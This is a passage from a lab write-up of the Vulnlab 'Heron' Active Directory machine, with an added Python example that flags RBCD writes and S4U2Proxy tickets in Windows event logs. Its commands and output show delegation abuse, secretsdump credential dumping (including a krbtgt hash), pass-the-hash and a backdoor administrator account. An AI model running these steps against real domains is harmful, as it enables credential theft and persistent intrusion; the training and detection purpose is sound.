[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:1080 ... heron.vl:88 ... OK
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ export KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache
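From the detection side, the two steps above leave distinct traces in the domain controller's Security log: a 5136 directory-object change to msDS-AllowedToActOnBehalfOfOtherIdentity on the MUCDC computer object (this needs Audit Directory Service Changes enabled and a SACL on the object), and a 4769 service-ticket request with a non-empty TransitedServices field, which is what S4U2Proxy produces. This added example (my own code, not the write-up's) runs that logic over constructed events; the field names follow the Windows event schema, the values and the tier-0 list are made up for the example.

```python
from typing import Dict, List

# Tier-0 computer accounts whose delegation settings must not change unnoticed.
# Constructed for this example; build the set from AD in practice.
TIER0_ACCOUNTS = {"MUCDC$"}
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

def _account_from_dn(dn: str) -> str:
    """CN=MUCDC,OU=Domain Controllers,DC=heron,DC=vl -> MUCDC$ ('' if not a CN)."""
    rdn = dn.split(",", 1)[0]
    return rdn[3:].upper() + "$" if rdn.upper().startswith("CN=") else ""

def detect_rbcd(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert per event that is an RBCD write or an S4U2Proxy hop."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        # 5136: directory object modified. Any write to the RBCD attribute on a
        # tier-0 computer object is worth an alert, whoever the subject is.
        if eid == "5136" and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            if _account_from_dn(ev.get("ObjectDN", "")) in TIER0_ACCOUNTS:
                alerts.append(f"RBCD write on {ev['ObjectDN']} by "
                              f"{ev.get('SubjectUserName')}")
        # 4769: service ticket requested. A TransitedServices value other than
        # "-" means S4U2Proxy: one account obtained the ticket for another user.
        elif eid == "4769" and ev.get("TransitedServices", "-") not in ("", "-"):
            if ev.get("ServiceName", "").upper() in TIER0_ACCOUNTS:
                alerts.append(f"S4U2Proxy ticket for {ev.get('TargetUserName')} to "
                              f"{ev['ServiceName']} via {ev['TransitedServices']}")
    return alerts

def sample_events() -> List[Dict[str, str]]:
    """Constructed events in the field layout of the Windows Security log."""
    return [
        {"EventID": "5136", "SubjectUserName": "adm_prju",
         "ObjectDN": "CN=MUCDC,OU=Domain Controllers,DC=heron,DC=vl",
         "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
        {"EventID": "5136", "SubjectUserName": "helpdesk-constructed",
         "ObjectDN": "CN=WS-CONSTRUCTED,CN=Computers,DC=heron,DC=vl",
         "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
        {"EventID": "4769", "TargetUserName": "_admin@HERON.VL",
         "ServiceName": "MUCDC$", "TransitedServices": "FRAJMP$@HERON.VL"},
        {"EventID": "4769", "TargetUserName": "julian.pratt@HERON.VL",
         "ServiceName": "MUCDC$", "TransitedServices": "-"},
    ]
```

The second 5136 event and the second 4769 event are the benign controls: an unrelated attribute change and a plain ticket request produce no alert.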
Then run secretsdump with that ticket:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-secretsdump -k mucdc.heron.vl
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:445 ... OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7a8b61a266b3e6ba7b55725d51f2b723
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36<redacted>4e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
HERON\MUCDC$:plain_password_hex:6ba8a<redacted>3adc3
HERON\MUCDC$:aad3b435b51404eeaad3b435b51404ee:a3623<redacted>94ee:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x76a0d28b7925171e2b82994b58e5991310b49216
dpapi_userkey:0xda9a3255d163e84c6ab4e578f44c544e80285f19
[*] NL$KM
 0000   5C A7 E2 A0 9A 0F 0E A7  0A 6F 35 33 21 07 83 01   \........o53!...
 0010   93 8A 8A 6D 21 3B C2 CA  60 E6 E6 B6 5A 22 04 A2   ...m!;..`...Z"..
 0020   D1 F4 93 69 36 20 AF BB  F7 38 31 3A BE E5 D5 29   ...i6 ...81:...)
 0030   55 5E 2B 54 ED A4 1B 52  03 FD 77 75 AC F2 9A 58   U^+T...R..wu...X
NL$KM:5ca7e2a09a0f0ea70a6f353321078301938a8a6d213bc2ca60e6e6b65a2204a2d1f493693620afbbf738313abee5d529555e2b54eda41b5203fd7775acf29a58
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:49667 ... OK
_admin:500:aad3b435b51404eeaad3b435b51404ee:39<redacted>38:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:654<redacted>d2:::
Get the flags:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.165.85\\C$ -U '_admin' --pw-nt-hash 39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Thu Jun  6 17:01:47 2024
  --snip--
  System Volume Information         DHS        0  Sun May 26 11:48:42 2024
  transfer                            D        0  Sun May 26 13:51:27 2024
  Users                              DR        0  Sat Jun  1 17:43:04 2024
  webaccounting                       D        0  Fri Jun  7 08:14:04 2024
  Windows                             D        0  Sun Jun  2 17:26:03 2024

		6261499 blocks of size 4096. 1962809 blocks available
Beyond root
proxychains xfreerdp /u:_admin /pth:39<redacted>38 /w:1566 /h:968 /v:10.10.134.197:3389
-> RDP in to MUCDC not allowed

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-wmiexec _admin@10.10.134.197 -hashes aad3b435b51404eeaad3b435b51404ee:39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:49669 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
heron\_admin
C:\>net user /add puck Password123!
The command completed successfully.
C:\>net localgroup Administrators puck /add
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:135 ... OK
The command completed successfully.

$ proxychains xfreerdp /u:puck /p:Password123! /w:1566 /h:968 /v:10.10.134.197:3389
---
C:\Users\puck>net user adm_hoka
User name                    adm_hoka
Full Name                    adm_hoka
Comment                      t0
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2024 4:50:28 AM
Password expires             Never
Password changeable          5/27/2024 4:50:28 AM
Password required            Yes
User may change password     Yes

Workstations allowed         admjmp_t0
Logon script                 \\heron.vl\SYSVOL\heron.vl\scripts\logon.vbs
User profile
Home directory               \\mucdc.heron.vl\home$\adm_hoka
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *admins_t0
The command completed successfully.
---
logon.vbs contains:
Option Explicit
Dim objShell, bgInfoPath, bgInfoConfigPath
Set objShell = CreateObject("WScript.Shell")
bgInfoPath = "\\heron.vl\SYSVOL\heron.vl\scripts\Bginfo64.exe"
bgInfoConfigPath = "\\heron.vl\SYSVOL\heron.vl\scripts\bginfo.bgi"
objShell.Run """" & bgInfoPath & """ """ & bgInfoConfigPath & """ /timer:0", 0, True
Set objShell = Nothing
This chain was really fun 🙂